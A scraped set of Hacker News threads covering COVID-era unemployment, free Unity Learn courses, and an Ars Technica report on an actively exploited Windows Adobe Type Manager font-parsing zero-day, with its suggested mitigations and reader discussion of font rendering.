I was in the restaurant industry during the last crisis. Lots of places stopped hiring and slowed down but business didn't suddenly stop.

mrfusion(700) 2 days ago [-]

What is the process for freelancers to get unemployment? I think that was mentioned in the new stimulus?

mempko(4112) 2 days ago [-]

Yes, you can thank Bernie Sanders for that.

cjslep(4316) 2 days ago [-]

I grew up with the puritanical mindset of: 'Your intrinsic worth as a human is the money you earn; because the money you earn is from how hard you work; and how hard you work is a reflection of your intrinsic Virtue.'

Thus I grew up in a family that loathes the unemployed. I really hope -- though I have grave doubts -- that this event gets through to them, so that they can have some personal growth, too.

twoquestions(4267) 2 days ago [-]

One of my big hopes is at the end of this mess, the Protestant Work Ethic and Prosperity Gospel go down in flames.

This event should show anyone with even a bit of sense that your 'virtue' is only a small part of your economic power.

Kaze404(10000) 2 days ago [-]

That is the saddest thing I've ever read on this site. I know there's people who believe that but it's still shocking to me.

mrfusion(700) 2 days ago [-]

Sadly everyone seems to be doubling down on their existing strong opinions.

(Any ideas to improve that?)

tr33house(4283) 2 days ago [-]

I think this is wrongly attributed as puritanical

bbxxcc(10000) 2 days ago [-]

I think loathing the unemployed (especially if it isn't caused by health conditions and isn't temporary, like in this case) is commonplace in any society. There are many studies which show unemployed people are more likely to commit crimes. e.g. [1]

Unemployed people, by definition, are net consumers. [2] Unless society as a whole actually produces wealth, there is nothing to tax, and the government doesn't have any money to spend. And how does wealth get created without people in employment? Unless you are the country with the reserve currency, which effectively gives you the ability to keep printing money until the world catches up to the con. Which doesn't still change the underlying economics, it is just that at any given point in time there is always some country which will be using the reserve currency status to make it appear like you can create wealth by printing more money.

Aiming for more employment is a net positive to any society, and I think that is what conditions people to loathe the permanently unemployed.

[1] https://www.jstor.org/stable/40057352?seq=1

[2] I remember reading an essay by PG about how getting employment is when you go from being a 'net consumer' to become a 'net producer', cannot find the link.

rubber_duck(10000) 2 days ago [-]

And this is just the start.

While I think the US response to Corona was slower than the response in my country I feel the US is the only country that's seriously discussing economic repercussions and debating the medical experts.

In EU (at least in my country) it's doctors running things and we are in 'stop the pandemic at all cost'. Everyone is in panic due to Italy situation. But doctors are only trained to see the medical side of the picture - and there is a point at which this approach to fighting the virus is going to have worse consequences than a full blown pandemic itself - I don't see anyone publicly discussing this point around here.

sundaeofshock(4011) 2 days ago [-]

Seriously? There were a number of submissions yesterday to HN discussing the relative merits of sacrificing millions for the sake of the market. Perhaps you missed those?

lbeltrame(10000) 2 days ago [-]

Unfortunately yes. Even if one wants to keep the quarantine at all costs, it should be a political decision, not only medical, after weighing everything.

In Italy, where I'm in my third week being shut in, experts and doctors are being quoted tiredlessly by the news: the problem is that they're doing their job (which is good!) however they do not realize the impact of their suggested measures. Not their fault by any means, but:

a. They're effectively scaring the population (an WHO advisor here suggested 6-9 months lockdown, which is likely impractical and will have devastating consequences on the social fabric, even without thinking about the economy)

b. The politicians are so scared of the virus that they're completely abdicating their functions (in Italy the Parliament was closed for two weeks, and the judicial system has been completely shut down as well) and doing whatever they're being told.

brightball(3951) 2 days ago [-]

The issue on the framing of this topic also boils down to who asks it.

I often hear it framed as: 'How much is a person's life worth?' or some general reference to stock values.

But when people say 'economy' this is what it really means:

https://www.bbc.com/news/world-asia-india-52002734

Cash flow, supply chains, jobs, bankruptcy, debt, poverty, famine and more than likely families breaking up (financial stress is the #1 cause of divorce) plus a spike in suicides.

That's the economic impact. And when the question of virtually guaranteeing that outcome around the world to a significant portion of the global population vs a risk of a negative outcome for for the percentage of people who are susceptible to serious issues from COVID-19...it gets a heck of a lot murkier.

There's not a heartless bad guy in this situation. Both outcomes are terrible and if you purely look at the number of people negatively impacted, the economic fallout of this approach with its cascading effects look significantly worse.

lordnacho(1856) 2 days ago [-]

I think it's a fair discussion to take, but how are you going to run an economy with the health service in permanent overload?

That is what would happen if you just let the thing pass. Those charts of 'squashing the sombrero' have the number of beds at a very low place compared to the expected hump of cases. On some of them you can barely even see the gap between the red line and the zero line, due to the scale of the hump.

Death rates would shoot up way above what is normal for the disease, people would die of all sorts of other preventable things too.

smallgovt(3949) 2 days ago [-]

For those who are willing to go through this thought exercise, if we're purely trying to maximize humankind's total well-being, how much wealth would we have to create to counteract one coronavirus victim's loss of life?

Here's a set of 3 questions that I think leads to a possible answer.

- How much would someone have to pay you to be put to sleep for 8 years, during which period you have no sensory input or output?

- Would you rather be put to sleep for 8 years now or at the end of your life?

- Do you have a preference over being put to sleep for the last 8 years of your life vs just dying straight up?

I think most people would be willing to go to sleep for 8 years for $2 million. And, most would prefer dying 8 years sooner over going to sleep now.

In other words, $2m > sleep for 8 years now > dying 8 years earlier == coronavirus victim

The moral dilemma is that we're asking one person to die 8 years sooner to create an outbalanced improvement in quality of life increase for someone else. That is, you're taking away well-being from one person to give to another. I think government officials implement policies that redistribute human well-being all the time, but it raises alarm bells when we start dealing with life and death.

SamuelAdams(3949) 2 days ago [-]

I saw this idea floated around on Reddit a few days ago. Basically the crux is that unemployment has a death toll, too.

So if you close all non-essential businesses, unemployment rises, which increases the likelihood of people losing health insurance, losing homes, not paying electrical bills, communication (internet / phone) bills, etc. If some people lose all those things and don't have access to them again for 2+ months, and have no other safety net, they might die. Doubly so considering the hospitals may be at capacity with COVID-19 cases.

So, what would be better - keep people at home and unemployed, where people die by lack of resources, or keep people going out where people die by spreading COVID-19?

The third options is to keep people at their residences but either pay them or reduce their bills / mortgages etc to 0 while COVID-19 blows over. But that could take 2-18 months. It was hard enough getting $1200 once for every American household - I doubt it will continue for another 18 months until a vaccine is developed.

qqssccfftt(10000) 2 days ago [-]

'How many people are we willing to kill to keep the economy moving?'

standardUser(10000) 2 days ago [-]

Most wealthy nations already have a robust social safety net in place. They don't need to rush to cobble together a temporary one in the same was the US does.

danans(3411) 2 days ago [-]

This boils down to the reality that governments can take measures to mitigate the economic damage caused by an idled labor force (direct payments to workers), but can do very little to mitigate the economic damage caused by a sick or dying labor force.

tuna-piano(3984) 1 day ago [-]

I think this is a false choice.

As Bill gates said, we can't say- 'Hey, keep going to restaurants, go buy new houses, ignore that pile of bodies over in the corner. We want you to keep spending because there's maybe a politician who thinks GDP growth is all that counts'

The truth is that it seems our choice is relatively simple:

1) Allow the virus to spread rapidly, overload the health system, kill many people, until herd immunity is reached.

2)Do partial shut down measures, some partial efforts at testing and contact tracing, let the virus continue for a long time, and more slowly reach option 1.

3)Do strong shut down measures until the virus is able to be controlled by a strong testing+contact tracing regime.

Iran (seems to have?) chosen option 1.

Italy started with option 2, and will hopefully move into option 3.

Option 3 is the only acceptable option that doesn't destroy the economy and health systems.

Unchecked, 10 cases of this virus will turn into 100s of thousands. That is the same with 10 cases in March, or 10 cases in May or 10 cases in any month.

loopz(10000) 2 days ago [-]

Each country has economic and market mitigations. Some are beginning to copy US model of Gov paying bills outright for a period. If everyone can do this with low cost, there's no reason for high risk and damage to economy later. This incident will make us learn fast.

The medical experts do consider economic and market impacts, and there are alignments in governments how to balance everything. However, since this is an unprecedented health crisis with unknown ramifications, that is first priority. Many measures are to create wiggling room to handle what unknown unknowns may come down the road as well.

This shows us systemic vulnerabilities, and societies will be forever changed, probably for the better.

mrfusion(700) 2 days ago [-]

And mental health too. How many new Alcoholics will this create? How many suicides?

smileysteve(10000) 2 days ago [-]

> the US is the only country that's seriously discussing economic repercussions and debating the medical experts

The only nation with a leader that promotes a 15 day plan and says the cure can't be worse than the cure 8 days in. It demonstrates a severe lack of resolve.

scottLobster(10000) 2 days ago [-]

Won't know for sure until Apr 03 (The Day BLS releases the official unemployment rate for March) but this may very well trip the Sahm recession indicator, which has correctly predicted/detected every US recession back to 1950 (If it's been further backfitted I can't find the data).

https://fred.stlouisfed.org/series/SAHMCURRENT

yread(253) 2 days ago [-]

I don't think you need a black magic/AI/fancy algorithm to tell whether there is a recession or not

donquichotte(3836) 2 days ago [-]

The economical impact of COVID-19 on people's lives will be far more severe than the biological one.

Hopefully this won't discourage governments from taking appropriate action once a more lethal pandemic comes.

johnpowell(4332) 2 days ago [-]

So lets say that there are a couple hundred thousand dead and you are pretty sure that 50% of the people out there have it. Are you going to go out for dinner or a movie? Not me..

But ignore me if you aren't saying that the restrictions should be reversed so the economy goes back to normal. A guy on CNBC just said that even if it means 400K would die. The economy just will not go back to normal anytime soon.

hopfog(4295) 2 days ago [-]

Just to illustrate how absurd this number is: https://pbs.twimg.com/media/EUCTISVXQAcIKEb?format=png&name=...

trackone(10000) 2 days ago [-]

This is messing up charts so much that maybe in a couple years we will be removing 2020 from the data just to have a chart that doesn't have a crazy x-axis.

dwaltrip(10000) 1 day ago [-]

Holy shit... That is absolutely nuts. And to think it will likely get worse.





Historical Discussions: Unity Learn platform free for three months (March 25, 2020: 497 points)
Learn Unity Premium is now free (March 22, 2020: 1 points)
Design, Develop, and Deploy for VR – Unity Learn (November 14, 2019: 1 points)

(498) Unity Learn platform free for three months

498 points 3 days ago by metreo in 10000th position

learn.unity.com | Estimated reading time – 2 minutes | comments | anchor

Create with Code Live

Register for the live classes now: 9 am PT series or 5 pm PT series. Come back here to follow along with the course materials and track your progress. You should receive instructions by email to join the webinar, or use these direct links to the Zoom sessions: Join Live M-F 9 am PT Join Live M-F 5 pm PT Create with Code is one of our most popular courses that makes learning to code fun through making your own games from scratch in C#. Starting on Monday, March 23, 2020 we are hosting a virtual Create With Code Live series open to students, teachers, and anyone else interested in learning to code. Each weekday from March 23 to May 8, Unity will host an hour-long virtual class with live Q&A at 9 am and 5 pm PT. Morning and afternoon sessions will cover the same content - choose the time that fits your schedule, or register for both. Sessions will be recorded and posted in these course pages for those who are unable to attend live. To join the 9 am PT live classes, register here To join the 5 pm PT live classes, register here Between classes, there will be up to 30 minutes of independent work. By the end of this course, you will have foundational skills in Unity, C# computer programming, game design, and development. For students, we recommend applying for the Unity Student plan to make the most of Unity, but this is not required for participation in Create with Code Live. To get set up for the course, please install Unity. Create with Code curriculum is aligned to ISTE Standards for computer science education.




All Comments: [-] | anchor

gentleman11(10000) 3 days ago [-]

If Unreal or Cryengine took the effort to create better learning resources like Unity does, they would grow dramatically. To find the name of a function I need in the c++ is a research project involving a dive through years of old forum posts.

ThrowawayR2(10000) 3 days ago [-]

Isn't Unreal already the dominant engine for AAA games?

eps(3377) 3 days ago [-]

I was looking at getting it for my kids just last week. Went through a bunch forums, reading through what people are saying and the overwhelming tone was that it's just not good. An ad-hoc collection of tutorials with no overall structure and that are more confusing than helpful. Too complicated for noobs, too trivial with those with a bit of experience.

If anyone has a firsthand experience with Unity Learn, I'd love to hear about it, and I'm sure others will find it useful too.

sidlls(10000) 3 days ago [-]

An ad-hoc collection of tutorials with no overall structure and that are more confusing than helpful

This is how I feel about most open source software documentation and tutorials/articles about library or software usage.

armatav(4133) 3 days ago [-]

Out of all the online courses, I would say they have the most fun/engaging content. It kind of makes sense too.

laegooose(10000) 3 days ago [-]

I went through a bunch of Unity courses. Wrote about the best one here https://news.ycombinator.com/item?id=22688437

In fact, it was my best experience among online courses on any subject.

enjoiful(10000) 3 days ago [-]

Check out Dreams for PS4. It's perfect to create games with kids.

metreo(10000) 3 days ago [-]

I'm doing a relatively short course right now on optimization which is instructive. Profiling is an important but strangely ad hoc task so I'm always looking for fresh content on the subject.

mrfusion(700) 3 days ago [-]

Would this teach me to develop for the Oculus quest?

I have some locomotion ideas I want to try out but I don't know Where to start.

zmmmmm(10000) 2 days ago [-]

I'm in the same boat - I think the Quest has amazing potential as a platform, would love to know more about how to get started with development for it.

jmckib(10000) 3 days ago [-]

Most of the development you'd do for Oculus is 90% the same with what you'd do for any other game, so I'd say yes, but you'll need to supplement with tutorials specifically for Oculus/Unity.

Impossible(242) 2 days ago [-]

Oculus and Unity released a course for VR development that will teach you the basics of developing for Quest https://learn.unity.com/course/oculus-vr

cachvico(10000) 2 days ago [-]

Yes - Unity supports the Quest (through Link mode). You can check out the XR Interaction Toolkit [1] for an easy way to get going with teleport locomotion.

[1] https://docs.unity3d.com/Packages/com.unity.xr.interaction.t...

k__(3378) 3 days ago [-]

Is there something like Unity out there but with JavaScript support?

I know a bunch of JS game engines, but they all have no tooling.

mattigames(3985) 3 days ago [-]

C# is not that different from JavaScript but maybe I'm biased, if you still want an easier way than using C# then I would recommend Unity plugins that let you create games without coding such as Playmaker[0] and Bolt[1], after getting comfortable using those they will be more ready to use C#.

[0] https://assetstore.unity.com/packages/tools/visual-scripting...

[1] https://assetstore.unity.com/packages/tools/visual-scripting...

kerng(2022) 3 days ago [-]

Switching to C# is straight forward - for majority of projects you won't need many language specific features. Most operations are about increasing counters, performing if and switch scenarios, some event messaging, and doing math and state tracking. C# is quite a good choice for those things.

pjmlp(200) 3 days ago [-]

Yes, the best engine in that regard is PlayCanvas,

https://playcanvas.com/

gentleman11(10000) 3 days ago [-]

Threejs has very little tooling, but it is a pleasure to work with if your project is simple. Babylonjs also looked promising

Finally, old versions of unity had some js support. You could maybe track down one of them, but the support was removed eventually

tomc1985(10000) 3 days ago [-]

Just learn C#, why stick to JS?

heyitsguay(10000) 3 days ago [-]

Unity has Javascript support, and can target WebGL for its builds.

Cpoll(10000) 3 days ago [-]

Phaser might fit the bill.

DonHopkins(3291) 3 days ago [-]

I've been developing UnityJS for scripting and integrating Unity3D with JavaScript, which works not only very well with the WebGL platform, but also on iOS, Android, and desktop. It's a work in progress, so it's low on tooling and documentation right now, but I've been using it successfully for quite some time for a lot of different things, and making a lot of progress towards modularizing it, documenting it, and making it easier for other people to use. Please contact me if you're interested!

https://news.ycombinator.com/item?id=19804242

Email: [email protected]

Goals:

Developing and applying UnityJS, an open source Unity3D C#/JavaScript bridge for rapidly developing and deploying dynamically extensible cross platform Unity3D apps programmed in JavaScript, and efficiently integrating Unity3D with off-the-shelf and bespoke web technologies and services.

Seeking to collaborate with people who can see and benefit from the obvious and subtle applications to rapid prototyping, exploratory iterative development, interactive debugging, live programming, deeply integrating web technologies and JSON with Unity3D, scriptable VR and AR platforms, and delivering open-ended extensible 3D browser-like applications on WebGL, mobile and desktop platforms.

I've been developing and supporting the open source UnityJS core by integrating both popular free Unity and JavaScript libraries (i.e. JSONDotNet, LeanTween, TextMesh Pro, UnityGLTF, SocketIO networking, Ace code editor, d3 visualization library, etc) and proprietary libraries and extensions (i.e. JauntVR SDK, MapBox SDK, your own SDK, or bespoke code that I develop), so they can all be easily and efficiently scripted and orchestrated together in JavaScript.

So far I've applied UnityJS to JauntVR's panoramic VR video player on Android, WovenAR's scriptable AR platform on iOS, and ReasonStreet's interactive financial data driven visualization system on WebGL, and I'm looking for other interesting people to work with on exciting and fitting applications for UnityJS!

https://github.com/SimHacker/UnityJS

https://github.com/SimHacker/UnityJS/blob/master/doc/Anatomy...

Here are some other things I've written about it on HN (in chronological order):

https://news.ycombinator.com/item?id=17309132

https://news.ycombinator.com/item?id=17384078

https://news.ycombinator.com/item?id=18171571

https://news.ycombinator.com/item?id=18860467

https://news.ycombinator.com/item?id=19748582

https://news.ycombinator.com/item?id=20313751

https://news.ycombinator.com/item?id=20744552

https://news.ycombinator.com/item?id=21932462

https://news.ycombinator.com/item?id=21932984

TomGullen(3990) 3 days ago [-]

Our tool Construct 3 runs in the browser, and has no programming required event blocks and Javascript support:

https://www.construct.net/en

Mix of events/Javascript in it's simplest form looks like:

https://s1.construct.net/images/v777/refresh/features/learn-...

Documentation for Javascript in Construct 3 can be found here:

https://www.construct.net/en/make-games/manuals/construct-3/...

We're doing special offers for education due to the pandemic:

https://www.construct.net/en/education-support

A key feature for schools is granting access to Construct 3's full features with access codes, meaning students do not need to proivde us with any login details/emails etc which is popular in educational institutes:

https://www.construct.net/en/make-games/education/licensing

PinkMilkshake(4082) 2 days ago [-]

BabylonJS has an official, Unity-like editor that runs in the browser: https://github.com/BabylonJS/Editor

antsoul(10000) 3 days ago [-]

Godot 4.0, with Vulkan support, will replace Unity really quickly.

andybak(2129) 3 days ago [-]

What makes you say that? Other than a belief in open source and a sense of optimism?

Do you have a firm grasp on the weaknesses and gaps in Unity as well as it's strengths? Would you say you have a clear understanding of the breadth of features and how much they matter to it's primary markets?

I'd love you to be right but you'll need to do more to convince me that you have some special insight in this matter.

dilap(3412) 3 days ago [-]

Right after Linux on the Desktop finally hits it big.

pjmlp(200) 3 days ago [-]

No it won't, because it doesn't have the GUI tooling at the same level, an optimizing AOT compiler for .NET, ability to write engine pipeline stages in .NET (DOTS), the quantity of items in the asset store, the sponsorship from Nintendo/Google/Microsoft and most important, it isn't part of the curriculum of many top level schools in games design.

It is still a nice engine for small teams though.

jayd16(10000) 2 days ago [-]

I really doubt it. Maybe one day but certainly not 'quickly' and especially not just from Vulkan.

I want to like Godot but it feels like it's making the same mistakes Unity 5.x and earlier did with fixed shader and script languages that just aren't as useful as the languages they're abstracting. I want to use GLSL or Vulkan or DX12 not a custom language that will get in my way. Its a C++ engine that uses script runtimes like Unity did. This makes it hard to optimize across languages and why Unity went down the whole IL2CPP path. Now Unity is moving more and more features into C# with a custom C# compiler to better optimize with user code. Godot will have to succeed where Unity could not.

Godot looks very promising but if you don't think its an uphill battle or that Unity is easy to beat you're mistaken.

BHSPitMonkey(4333) 2 days ago [-]

As long as the gaming hardware giants (consoles and VR) continue partnering closely with Unity and Unreal and giving those engines several months of lead over open-source engines when it comes to platform support... no, it will not.

brianjerez(10000) 3 days ago [-]

Perhaps this is not the topic to ask but besides unity which other companies are offering free moocs and/or video tutorials because of the COVID-19?

JCoder58(10000) 3 days ago [-]

Epic Games has offered numerous free courses about Unreal Engine 4. Both game related and industry related courses are available.

https://www.unrealengine.com/en-US/onlinelearning-courses

BrianHenryIE(10000) 2 days ago [-]

Udacity have one month free.

maroonblazer(4154) 3 days ago [-]

Not a mooc or video but a number of Minecraft creators have generously made their educational content free until June.

Disclosure: I'm a part of the Minecraft team.

https://www.minecraft.net/en-us/article/free-educational-con...

laegooose(10000) 3 days ago [-]

[1] is the single best online course I had. It took ~30 hours to complete, and we all know how easy it is to drop a course after couple sessions.

It teaches from very basics, at the same time the projects are diverse and fun because 3D-assets and effects are provided.

Chunk size is perfect, few minutes video and then it's few minutes of work in the editor. Videos have short text summary so there's no need to rewind the video if I missed something.

Often it solves a problem in a naive but incorrect way, and then fixes it. So when I encounter a problem in real project, I often have experience dealing with it.

It has debugging projects, where you have a complete project which is broken in multiple ways. So smart. In my regular programming work I spend most time debugging, not creating from scratch.

The narrator (Carl D.) is charismatic, videos are very professional.

I wish there were more courses with same structure and quality. Can't recommend it enough.

[1] https://learn.unity.com/course/create-with-code

DevKoala(4133) 2 days ago [-]

I also cannot recommend this course enough. I learned Unity basics over the winter break thanks to it. I am very comfortable prototyping now.

metreo(10000) 3 days ago [-]

That course isn't even premium content I don't think.

JshWright(3675) 3 days ago [-]

> The narrator (Carl D.) is charismatic

I just watched the intro video, it seemed like he was yelling the whole time...

enjoiful(10000) 3 days ago [-]

I would highly recommend learning Dreams for PS4. This is going to change the way video games are made. It provides an accessible way to get into game creation in a fun and accessible way. I would have killed to have Dreams when I was 12 years old.

Look up all the amazing things that can be made with this engine. It's incredible!

travbrack(10000) 2 days ago [-]

No PC version though sadly.





Historical Discussions: Windows code-execution zeroday is under active exploit, Microsoft warns (March 23, 2020: 488 points)

(488) Windows code-execution zeroday is under active exploit, Microsoft warns

488 points 5 days ago by vo2maxer in 276th position

arstechnica.com | Estimated reading time – 4 minutes | comments | anchor

Attackers are actively exploiting a Windows zero-day vulnerability that can execute malicious code on fully updated systems, Microsoft warned on Monday.

The font-parsing remote code-execution vulnerability is being used in "limited targeted attacks," against Windows 7 systems, the software maker said in an advisory published on Monday morning. The security flaw exists in the Adobe Type Manager Library, a Windows DLL file that a wide variety of apps use to manage and render fonts available from Adobe Systems. The vulnerability consists of two code-execution flaws that can be triggered by the improper handling of maliciously crafted master fonts in the Adobe Type 1 Postscript format. Attackers can exploit them by convincing a target to open a booby-trapped document or viewing it in the Windows preview pane.

"Microsoft is aware of limited, targeted attacks that attempt to leverage this vulnerability," Monday's advisory warned. Elsewhere the advisory said: "For systems running supported versions of Windows 10 a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities."

Microsoft didn't say if the exploits are successfully executing malicious payloads or simply attempting it. Frequently, security defenses built into Windows prevent exploits from working as hackers intended. The advisory also made no reference to the volume or geographic locations of exploits. A fix is not yet available, and Monday's advisory provided no indication when one would ship.

What to do now?

Until a patch becomes available, Microsoft is suggesting users of non-Windows 10 systems use one or more of the following workarounds:

  • Disabling the Preview Pane and Details Pane in Windows Explorer
  • Disabling the WebClient service
  • Rename ATMFD.DLL (on Windows 10 systems that have a file by that name), or alternatively, disable the file from the registry

The first measure will prevent Windows Explorer, a tool that provides a graphical user interface for displaying and managing Windows resources, from automatically displaying Open Type Fonts. While this stopgap fix will prevent some types of attacks, it won't stop a local, authenticated user from running a specially crafted program to exploit the vulnerability.

The second workaround—disabling the WebClient service—blocks the vector attackers would most likely use to wage remote exploits. Even with this measure in place, it's still possible for remote attackers to run programs located on the targeted user's computer or local network. Still, the workaround will cause users to be prompted for confirmation before opening arbitrary programs from the Internet.

Microsoft said that disabling the WebClient will prevent Web Distributed Authoring and Versioning from being transmitted. It also stops any services that explicity depend on the WebClient from starting and logs error messages in the System log.

Renaming ATMFD.DLL, the last recommended stopgap, will cause display problems for applications that rely on embedded fonts and could cause some apps to stop working if they use OpenType fonts. Microsoft also cautioned that mistakes in making registry changes to Windows—as required in one variation of the third workaround—can cause serious problems that may require Windows to be completely reinstalled. The DLL file is no longer present in Windows 10 version 1709 and higher.

Monday's advisory provides detailed instructions for both turning on and turning off all three workarounds. Enhanced Security Configuration, which is on by default on Windows Servers, doesn't mitigate the vulnerability, the advisory added.

Targeted... for now

The phrase "limited targeted attacks" is frequently shorthand for exploits carried out by hackers carrying out espionage operations on behalf of governments. These types of attacks are usually limited to a small number of targets—in some cases, fewer than a dozen—who work in a specific environment that's of interest to the government sponsoring the hackers.

While Windows users at large may not be targeted initially, new campaigns sometimes sweep larger and larger numbers of targets once awareness of the underlying vulnerabilities becomes more widespread. At a minimum, all Windows users should monitor this advisory, be on the lookout for suspicious requests to view untrusted documents, and install a patch once it becomes available. Windows users may also want to follow one or more of the workarounds but only after considering the potential risks and benefits of doing so.




All Comments: [-] | anchor

greggman3(10000) 4 days ago [-]

I really wish (hope) that Microsoft is working on a brand new OS with a VM like thing for running legacy stuff (like Apple did with OS9 to OSX)

They really do need to start over from scratch, get rid of all the cruft, design the APIs not to suck, design in security, permissions, and sandboxing from the beginning. Make root kits and other spyware much harder. Get rid of installation scripts (more like iOS/Android/Some Mac app) and a million other things.

I don't hate windows but I hate that every app I install including every game on steam or the oculus store or humble bundle can basically own my machine.

zvrba(3901) 4 days ago [-]

> They really do need to start over from scratch, get rid of all the cruft, design the APIs not to suck, design in security, permissions, and sandboxing from the beginning.

Security model is still better than what POSIX provides. As for sandboxing: 'For systems running supported versions of Windows 10 a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities.' From https://portal.msrc.microsoft.com/en-us/security-guidance/ad...

jfkebwjsbx(10000) 4 days ago [-]

They don't need to get rid of anything, and in fact they cannot. People want their current stuff.

What they can add is sandboxed apps with a virtual filesystem and whatnot.

But they do not want to spend the manpower to do so, it seems.

MikusR(260) 4 days ago [-]

Windows 10x is exactly that.

contextfree(4313) 2 days ago [-]

these were/are basically the goals of UWP and Windows Core/10X

ChrisSD(4203) 5 days ago [-]

> For systems running supported versions of Windows 10 a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities.

Which is still not good but not as bad as it could be.

saagarjha(10000) 5 days ago [-]

Isn't this code running in Windows Explorer? That sounds like it could potentially be pretty bad.

topspin(4224) 4 days ago [-]

> Which is still not good but not as bad as it could be.

Not great, not terrible.

...sorry

llcoolv(10000) 5 days ago [-]

Why do people still use this 'OS' is beyond me.

tbezman(10000) 5 days ago [-]

gaming

jlgaddis(3000) 4 days ago [-]

Really?

I've never used Windows 10 and it's been years since I had a Windows machine on my desk but is it really that difficult to imagine and/or understand why ~90% of the world's PCs run Windows?

miohtama(3341) 5 days ago [-]

It says Adobe... So there is a component from Adobe in the core windows? Or does the DLL come with a PDF reader installation?

gruez(3847) 5 days ago [-]

>So there is a component from Adobe in the core windows

Doesn't seem to be. The file (ATMFD.DLL) doesn't exist in a fresh install of Windows 10 1909 enterprise.

kevingadd(3907) 5 days ago [-]

It's an adobe component in Windows to handle fonts because Adobe controls/controlled a big part of the font ecosystem. At this point I believe the Windows team controls it and can make changes to it, but it's definitely supporting adobe file formats

calibas(10000) 5 days ago [-]

It's needed for displaying Postscript Type 1 fonts. I believe Adobe owns the licensing for everything but it's up to Microsoft to update the Windows 10 DLL.

voldacar(4336) 4 days ago [-]

Why should a kernel even have the slightest idea what a font is? this is absurd

wolfi1(4217) 5 days ago [-]

MS should consider including the freetype library instead of Adobe's type manager

jfk13(2957) 5 days ago [-]

The new(ish) CFF renderer in Freetype also comes from Adobe. I don't know whether it shares any code with what's in ATM, and if so, whether any vulnerability might be applicable to both, but it might be interesting for someone knowledgeable to investigate.

Tempest1981(4254) 5 days ago [-]

Someone posted this comment in the arstechnica article:

To be clear and despite its name, this is not Adobe code. Microsoft was given the source code for ATM Light for inclusion in Windows 2000/XP. After that, Microsoft took 100% responsibility for maintaining the code.

Microsoft has added additional code and removed code from that DLL (they shove all their Type 1 handling and Open Type font format handling into that one DLL)

hackersword(10000) 5 days ago [-]

Where is ATMFD.DLL ?

I am not seeing that in c:\windows\system32\ATMFD.DLL in multiple different windows10 machines I've checked.

unnouinceput(10000) 5 days ago [-]

this is a mistake in article. atmfd.dll is for older version of windows. Windows 10 has it under name of ATMLIB.DLL.

Search for that one instead and rename it.

glofish(10000) 5 days ago [-]

No patch available but one of the recommended mitigations is to:

  Rename ATMFD.DLL
would it be possible to have a patch that renames this file for me, if that is indeed a desirable and workable solution.
rkagerer(4201) 5 days ago [-]

In the meantime:

    Right-click C:\Windows\System32\atmfd.dll
    Properties | Security | Advanced | Owner, take ownership.
    Close dialogs, go back in and give yourself Full Control.
Now you can rename the file.
pas(10000) 4 days ago [-]

Win10 is supposed to be evergreen, aggressively auto-updating, etc. so how come there are years old versions around!?

(Win10 1703+ is already not using this DLL, that came out years ago.)

lexicality(10000) 4 days ago [-]

Because idiots do everything they possibly can to stop their os updating

jfkebwjsbx(10000) 4 days ago [-]

Evergreen? There is not much new in Windows 10, everything is based on the previous version.

EmilioMartinez(10000) 4 days ago [-]

What is a good way to keep up with active vulnerabilities and zero-days?

alyandon(10000) 4 days ago [-]

Requires a Microsoft account but I subscribe to their email lists.

https://www.microsoft.com/en-us/msrc/technical-security-noti...

jliptzin(4143) 5 days ago [-]

When has someone ever thought there wasn't a Windows zeroday under active exploit?

nabakin(10000) 5 days ago [-]

No one. They are adding emphasis.

robocat(4320) 5 days ago [-]

Some additional points from https://www.itnews.com.au/news/new-remote-code-execution-win...

* Attackers can exploit the vulnerability by embedding the Type 1 fonts into documents and convincing users to open them

* The vulnerabilities lies in the Windows Adobe Type Manager Library ATMFD.DLL

* disabling the Windows WebClient service blocks what Microsoft says is the most likely remote attack vector, through the Web Distributed Authoring and Versioning (WebDAV) client service.

* local, authenticated users can run malicous programs that can exploit the vulnerability (I presume this is a privilege escalation).

afrcnc(4247) 4 days ago [-]

or you can link to the actual MSFT advisory instead of all these articles rewording the same thing: https://portal.msrc.microsoft.com/en-US/security-guidance/ad...

peter_d_sherman(262) 4 days ago [-]

I've always wondered why fonts are rendered programmatically...

Usually, font renderers are Turing complete in some way, and usually this opens up security concerns, and rightfully so...

One of the primary reasons why fonts are rendered programmatically is because there's a theoretically infinite set of sizes/styles that might be required...

Well... why not make fonts with glyphs that are say, 5000 x 5000 pixels... and then instead of rendering for a particular size, line by line, stroke by stroke, curve by curve, why not instead use an interpolation algorithm to shrink that 5000 x 5000 pixel glyph to the exact size you want?

If a font provider program were made to operate that way, then all that would be needed to audit the program for security - would be to audit the shrinking/interpolation algorithm -- which could be as simple as possible (it's just a function which shrinks a bitmap of size A to another bitmap of size B... not a Turing machine which ingests other programs...)

Yes, fonts would consume much more memory (I suppose they could be compressed), but doing things that way might make font-providing programs more secure. And yes, you'd need to provide extra glyphs for italic, bold, bold italic, etc. (much more memory), but you'd be making a trade-off for a simple, security auditable font-provider... (we assume it's open-source...)

dvhh(4282) 4 days ago [-]

Fonts do have other features that were not much used in the programming/tehc world.

but one example there would be support for ligatures, which could be a lot more complex depending of the language you want to support.

And depending on the rendering speed you want, you might want to perform some JIT compilation, which unfortunately might not cover all edge cases.

virgilp(10000) 4 days ago [-]

You're also forgetting things like ligatures. And, how would you even render your proposed fonts in embedded devices? The solution is not 'huge bitmaps'.

EmilioMartinez(10000) 4 days ago [-]

For starters, small characters are not just sized-down versions of large characters. Ligatures et al further complicate things. When you actually try to deal with font management and image quality you'll realize why they went through the trouble of making it so.

jstimpfle(3752) 4 days ago [-]

Font rendering is a dark art at common resolutions of ~96dpi. These displays are not really suited to display resizable fonts (as opposed to hand-crafted bitmap fonts). To render half-way readable fonts at ~96dpi you cannot just pre-render at an extremely high resolution and then downsize using a generic algorithm. (Even ignoring the unacceptable cost). To the best of my knowledge most fonts are only readable at 96dpi because glyphs have manually picked control points to make sure that certain delicate points are aligned to the pixel grid.

jchw(4332) 4 days ago [-]

Well if you just want static vector fonts alone you don't need anything programmatic; vector images are not inherently code anymore than raster ones. For TrueType I'm pretty sure the VM is only for hinting. OpenType has more flexibility but I haven't anecdotally seen many vulnerabilities around OpenType. I suspect Type 1 is subject of many vulnerabilities specifically because it's old code that doesn't get as much usage.

jonas21(1632) 4 days ago [-]

Well, for starters, there's kerning [1], hinting [2] and subpixel rendering [3] so that your text stays legible, even at small sizes.

